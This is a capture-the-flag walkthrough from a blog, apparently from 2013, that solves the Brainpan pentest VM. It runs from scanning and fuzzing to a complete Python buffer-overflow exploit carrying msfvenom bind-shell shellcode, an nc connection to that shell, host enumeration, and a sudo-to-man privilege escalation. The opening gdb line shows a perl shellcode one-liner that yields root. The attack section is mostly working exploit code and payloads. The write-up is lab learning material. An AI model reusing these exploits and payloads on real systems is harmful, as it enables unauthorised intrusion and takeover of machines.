Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
process 16807 is executing new program: /bin/bash
process 16807 is executing new program: /usr/bin/whoami
root

Program exited normally.
(gdb)

Thursday, November 21, 2013

Brainpan Pentest VM Solution

BRAINPAN PENTEST VM SOLUTION BY 1N3

                          
      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          


# OVERVIEW
Brainpan is a test VM used for pentesting/hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walkthrough covers the basic steps to obtain "root" access to brainpan.

# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
192.168.1.132   00:0c:29:90:72:0d    01    060   VMware, Inc.                                                                                                      

# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=11/6%Time=5279FCEC%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20&gt;&gt;\x20");
MAC Address: 00:0C:29:90:72:0D (VMware)

# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster & 

# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.

# DOWNLOAD brainpan.exe
wget http://192.168.1.132/bin/brainpan.exe

# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.

* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...

# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine for debugging with OllyDbg or Immunity Debugger. Find which bytes overwrite EIP and find a suitable JMP ESP address. Use msfvenom to create a bind shell for Linux using the brainpan IP. Create a working buffer overflow exploit (see below).


# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B


#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122
#
# One-shot test client for the brainpan service.  Connects to TCP/9999 on
# `target`, reads whatever the service sends first (the banner/password
# prompt captured by nmap above), sends a single fixed 1024-byte cyclic
# pattern (the pattern_create.rb 1024 output above) and disconnects.
# Python 2 syntax (print statement, str payload).  There is no error
# handling: a refused connection or a reset raises socket.error and the
# socket is not closed on that path.


import socket

# Host running brainpan.exe.  Note this is not the 192.168.1.132 found by
# netdiscover/nmap above; set it to the VM under test.
target = "192.168.1.119"

# 1024-byte (not bit) unique string from pattern_create.rb
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"

print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))   # connect() returns None; this assignment is never used
s.recv(1024)                       # drain the initial banner; the bytes are discarded
print "Sending evil buffer..." + buffer
s.send(buffer)                     # return value (bytes actually written) is not checked
s.close()


root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# 







msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134

[*] Exact match at offset 524  
* This means the four bytes at offsets 524-528 of the pattern are what overwrite EIP...

# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"


# CREATE THE EXPLOIT...
# brainpan_exploit.py by 1N3 - 20131121

#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                          
#
#!/usr/bin/python
# Proof-of-concept for the brainpan.exe stack overflow worked out above:
# 520 bytes of padding, 4 bytes over the saved-EBP slot, the JMP ESP
# address over EIP, a NOP sled and the msfvenom bind-shell payload, then
# an attempt to connect to the resulting listener. Python 2 syntax
# throughout (print statements, plain str buffers).


import socket
import os
import subprocess


# vars
target = "192.168.1.132"
# Padding up to the saved-EBP slot: pattern_offset reported EIP at offset
# 524, so 520 bytes plus the 4 filler bytes below put the next 4 on EIP.
buffer1 = '\x41' * 520
ebp = '\x90' * 4
# Little-endian encoding of address 0x311712F3 inside brainpan.exe.
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
# The payload is a bind shell (linux/x86/shell_bind_tcp above), so the
# client side connects to the target host, not back to the attacker.
command = "nc -vv 192.168.1.132 4444"


#shellcode bind shell port 4444 192.168.1.132
# NOTE(review): these bytes differ from the msfvenom output pasted above
# (\xda\xcd... there, \xd9\xea... here); shikata_ga_nai output varies per
# run, so this was presumably regenerated -- both are 105 bytes.
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")


# NOOP sled
NOOP_sled = '\x90' * 104


# construct entire buffer: 520 + 4 + 4 + 104 + 105 = 737 bytes
# (matches the "Total buffer length" printed in the run below).
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode


print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket.connect() returns None; the assignment is never used.
connect=s.connect((target,9999))
# Read and discard whatever the service sends first.
s.recv(1024)
# Echoes the raw payload bytes to the terminal, hence the garbled
# characters in the transcript below.
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
# NOTE(review): a single string without shell=True is looked up as one
# program name, which raises OSError on Unix instead of running nc; the
# run below shows no traceback, so confirm how this behaved. The
# os.system() call on the next line is the one that can actually run it.
subprocess.call(command)
os.system(command)
print "Done..."
s.close()
# Bare name: evaluates the builtin without calling it, so this is a no-op;
# the script ends here regardless.
exit


# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� 1�����������������������������������������������������������������������������������������������������������t$���d�Z)ɱ 1Z Z �� 8�UlK �����\����g�
                               ~T�o�2��{J � n�h�tnV ���k*#Y ��eG��"��ß¡e{$ �KQj�6�
Done...
Connecting to bind shell...

nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web


# DISTRO VERSION
cat /etc/release
Ubuntu 12.10

uname -a
Linux version 3.5.0-25-generic


# PROCESSES
ps -auxxx

 root       732     1  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
root       838   732  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
...
...
puck       910   909  0 06:47 ?        00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck       911   910  0 06:47 ?        00:00:00 /bin/bash /home/puck/checksrv.sh
puck       926   911  0 06:47 ?        00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck      1693     1  0 08:49 ?        00:00:00 /bin//sh
puck      1949     1  0 08:53 ?        00:00:00 /home/puck/web/bin/brainpan.exe
puck      1953     1  0 08:53 ?        00:00:00 /usr/bin/wineserver
puck      1959     1  0 08:53 ?        00:00:00 C:\windows\system32\services.exe
puck      1963     1  0 08:53 ?        00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck      1972     1  0 08:53 ?        00:00:00 C:\windows\system32\plugplay.exe


# CRONTAB
cat /etc/crontab
# what can be done with this? The file is owned by root and runs as root, but how could it be edited? (The header shown is the user-crontab layout without the user column that /etc/crontab carries, and ps above lists checksrv.sh running as puck, so this may be puck's own crontab rather than a root job -- worth confirming with crontab -l.)
# m h  dom mon dow   command
* * * * * /home/puck/checksrv.sh


# SHOW LAST USERS TO LOGIN
#
last 
root     tty1                          Mon Mar  4 13:43 - 13:43  (00:00)
anansi   tty3                          Mon Mar  4 12:17 - 13:38  (01:20)
anansi   tty3                          Mon Mar  4 12:17 - 12:17  (00:00)
puck     tty3                          Mon Mar  4 11:30 - 12:17  (00:47)
puck     tty3                          Mon Mar  4 11:30 - 11:30  (00:00)
puck     tty2                          Mon Mar  4 11:07 - 13:38  (02:30)
puck     tty2                          Mon Mar  4 11:07 - 11:07  (00:00)
anansi   tty2                          Mon Mar  4 11:03 - 11:07  (00:04)
anansi   tty2                          Mon Mar  4 11:03 - 11:03  (00:00)
anansi   tty2                          Mon Mar  4 10:58 - 10:59  (00:01)
anansi   tty2                          Mon Mar  4 10:58 - 10:58  (00:00)
reynard  tty1                          Mon Mar  4 10:48 - 13:43  (02:54)
reynard  tty1                          Mon Mar  4 10:48 - 10:48  (00:00)


# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash


# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/

/home/puck/.wine:
total 816K
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r--  1 puck puck   11 Mar  4  2013 .update-timestamp
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 dosdevices
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 drive_c
-rw-rw-r--  1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r--  1 puck puck  26K Nov 19 08:53 user.reg
-rw-rw-r--  1 puck puck 2.1K Mar  4  2013 userdef.reg


/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck   10 Mar  4  2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck    1 Mar  4  2013 z: -> /

/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 Program Files
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 users
drwxrwxr-x 13 puck puck 4.0K Mar  4  2013 windows

/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 5 puck puck 4.0K Mar  4  2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Internet Explorer

/home/puck/.wine/drive_c/Program Files/Common Files:

/home/puck/web:
total 816K
drwxrwxr-x  3 puck puck 4.0K Mar  4  2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 bin
-rw-rw-r--  1 puck puck  215 Mar  4  2013 index.html
-rw-------  1 puck puck 797K Mar  4  2013 soss-infographic-final.png

/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 3 puck puck 4.0K Mar  4  2013 ..
-rwxr-xr-x 1 puck puck  21K Mar  4  2013 brainpan.exe

# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python

# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp

# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....

lsof -i:9999
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck   10u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
brainpan. 1949 puck   11u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
wineserve 1953 puck   27u  IPv4  26008      0t0  TCP *:9999 (LISTEN)

lsof -i:10000
COMMAND PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
python  926 puck    3u  IPv4   8661      0t0  TCP *:webmin (LISTEN)

# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1756/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      924/python     
udp        0      0 0.0.0.0:39859           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           - what's this port do?              
udp6       0      0 :::22091                :::*     


# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz    linux_gather_files.sh  linux_privesc_check
linux_checksec.sh  linux_priv_esc.sh      out
puck@brainpan:/home/puck/privesc$  

# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.

#  RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man

MAN(1)                        Manual pager utils                        MAN(1)


NAME
       man - an interface to the on-line reference manuals


SYNOPSIS
       man  [-C  file]  [-d]  [-D]  [--warnings[=warnings]]  [-R encoding] [-L
       locale] [-m system[,...]] [-M path] [-S list]  [-e  extension]  [-i|-I]
